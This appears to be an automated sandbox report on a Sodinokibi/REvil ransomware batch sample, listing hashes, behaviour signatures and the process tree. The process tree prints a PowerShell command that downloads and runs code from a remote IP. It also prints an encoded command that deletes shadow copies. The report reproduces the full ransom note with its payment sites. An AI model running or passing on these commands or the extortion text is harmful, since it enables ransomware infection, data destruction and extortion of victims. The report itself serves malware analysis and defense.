Analysis

  • max time kernel
    38s
  • max time network
    37s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    07-06-2020 11:10

General

  • Target

    0c8fe037f03d1ce50314d43d98fbb194.bat

  • Size

    219B

  • MD5

    7ade68e5f45f65e5f0d80987ec07fe12

  • SHA1

    ad4667dfd46bd31108df3355378d115891af37b4

  • SHA256

    bb6e5707ed0e890b78840f7baf4ddc06662c752d1db3c0b7f510db84c544a44f

  • SHA512

    24c287f1306c94c85824f19d7285525afc0dad378975bbf1b92fd4b6217cfb3f33f0c2f98634cc8b2d9a65af5fbd8ad3cc1ddfcec1af86a97bfdf3d84f6f0a7a

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/0c8fe037f03d1ce50314d43d98fbb194

Extracted

Path

C:\a718494f64-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension a718494f64. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E93CD2D66E9B0E2E 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/E93CD2D66E9B0E2E Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 5ug/ePDFRARBNi2DL5ohvbzAuRbnvI0prM/iEx9up2I8nd+UXON/+LLw4ZSXy8tL bIFLzVvHInCVtLkfM+doXqd+1He1nHsLNOO+xZSisV0CpQsn5E5yR5eDrYeuh8Q1 Cqfe32uDf22ncQGYDDPhZsik+xAvaDBnJAbEjgAJzWkBP5JucvGvqxim7J8jwgEd 7+a3MGA2vyUougcbRGzSfZ1Wi+Vliyr7lCD1LfHul4hHuiSu+lN8uj5Va702uE4H ZOBwsbD8G7wEN5cKe42rtc+dy7nrNqXc3f5KyDj4VaGu3vupKFBi1iOoaUc19Kyp nGEMQ4ae1dwL59rm9Eydn93oFe04bWZMCYbim9hDoAsqcxTl9aIr/MZds1964seE n0UOaETOJpcuIjIRsopzmpmS1bp33jPVf6KYFVmZcLyDlzM08Wfbled/N8rWMrN4 /sPtg6rmn/KnjB8QnLlachZNZTP10zohVVErbYjzPyzZf5/V5b1i/ZVhZU2+R70y 98vXjwyx2ZyltfOI75SKy4bkoxSXllyeA5e8v5tsG0RAvEy0FDgIXuVAErtWttHN SDUhjK6pvRIzJOtNDU+I13PfxLqxmVI7obMvnWUepWTTfzcwFA539sbLzS2I+aTO z+FBhPemoVSkItFtFZfyzgSFlVtnm4cF+L4/+/A9AGOwaWd8shBgrfvXLNfebbfm KxPvaFEcnciXflIwJ6Yh6TJLqyNStSCWD0aC0IQCUalhm1lBeBfgXBTvnCEQOEfx NXbGxm2j+U1VzDsVBBNZXJ7GJJmzXbAwsvRnzAeHI7ZqCE+PI0VeteBkSbepaSkf z5r1ZHaweAfs+NWcqhOgjxZsVxHSdSNCoD2KlbDtzEo5S839EQb2J6VMnyFuSpa6 j16KRLF1oTAha3aConSX9biRKV+XEvsJoEgtnhrvZ50ykXXdqA6g11lXXxKZTco/ VxBQPBBsUwrK7kxVWcpkxYlMuWfIbqK1IFXaqw8u5OJsljaGkmP/115gMcBwdqAF gH7Y/M5GkQBtbYGnXC0XiHKr14h0OM1o84rZK3PmD5KibtTUGuSXiXe7liWgAXiG //l7B4Xb76ZtpkYTcHW50du88iFO3AeEyat2HoNtRgCYw9BeipisHKmO6wH51oRp IFH2HKW6AVYCk4P8mUqCPxPdT/n6TLHjozxR3WfzmMfHNTMxLEG6vc9ZF3pWGMlJ Haktz80NoAirAHQxrtWZUNJY6bNEb72XALt/NBunPFE3S4mKx3c8lt5tPbQO9VW6 NHd/rftR/Kkv0zFk1LMsPfsB0y1l/PeCI9xJrQWuDzAeRQ3vBeqJBQ== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E93CD2D66E9B0E2E

http://decryptor.cc/E93CD2D66E9B0E2E

Signatures

  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 34 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Blacklisted process makes network request 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\0c8fe037f03d1ce50314d43d98fbb194.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1512
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/0c8fe037f03d1ce50314d43d98fbb194');Invoke-NIZOHWYRLEXH;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Blacklisted process makes network request
      PID:1012
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1552
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1764

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms